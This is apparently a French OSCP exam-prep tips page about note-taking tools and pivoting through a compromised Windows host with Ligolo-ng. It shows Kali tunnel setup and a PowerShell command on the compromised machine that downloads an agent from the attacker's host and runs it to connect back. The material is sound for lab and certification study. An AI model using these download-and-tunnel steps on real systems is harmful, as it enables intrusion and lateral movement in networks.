OSCP 🆕
Je vais peupler cette page avec quelques tips qui m'ont servi pendant le passage de l'OSCP
Prise de notes​
Pour prendres des notes pendant les modules, j'ai utilisé Obsidian.
Rapide léger et qui se synchronise avec Nextcloud, c'est un must-have combiné avec FlameShot. J'ai mis longtemps à migrer depuis Notion, mais le fait d'avoir les fichiers de Markdown en local et synchro sur un cloud privé c'est pépite.
Pour la synchro, utilisation de Webdav avec Nextcloud par le plugin Remotely Save
Pivoter comme un chef avec Ligolo​
J'ai eu un use case dans lequel la machine que je souhaite compromettre n'avait pas de route vers ma machine Kali. Je pivote habituellement avec chisel mais dans ce cas là cela ne fonctionnait pas :
Ultra problématique car impossible de récupérer des outils depuis ma kali
J'ai donc découvert Ligolo :
https://github.com/nicocha30/ligolo-ng
Sur mon schéma; MS01 est donc mon pivot et MS02 est ma cible.
Il me faut donc deux fichiers pour pivoter correctement vers ma cible et avoir un flux aller/retour qui fonctionne : le fichier proxy à utiliser sur ma machine Kali et le binaire agent.exe à déposer lui sur mon pivot Windows compromis (MS01)
setup Kali​
Côté Kali, le setup se fait comme suit :
J'ai crée un script bash pour me faciliter le taff mais sur le principe il suffit d'ajouter une carte virtuelle ligolo
┌──(kali㉿kali)-[~/exam]
└─$ sudo ip tuntap add user kali mode tun ligolo
┌──(kali㉿kali)-[~/exam]
└─$ sudo ip link set ligolo up
┌──(kali㉿kali)-[~/exam]
└─$ sudo ip route add 10.10.x.x/24 dev ligolo
Je lance donc mon proxy :
┌──(kali㉿kali)-[~/exam]
└─$ ./proxy -selfcert
setup Windows​
Sur mon pivot compromis, je peux démarrer l'agent ainsi :
C:\Users\pwned.user\Documents> iwr -uri http://192.168.x.x/agent.exe -Outfile agent.exe
C:\Users\pwned.user\Documents> .\agent.exe -connect 192.168.x.x:11601 -ignore-cert
En rebasculant côté Kali dans ma console Ligolo je peux lancer mon tunnel :
session
start
Et en avant, je peux alors utiliser mes commandes et ligolo fait le taff de routing comme un grand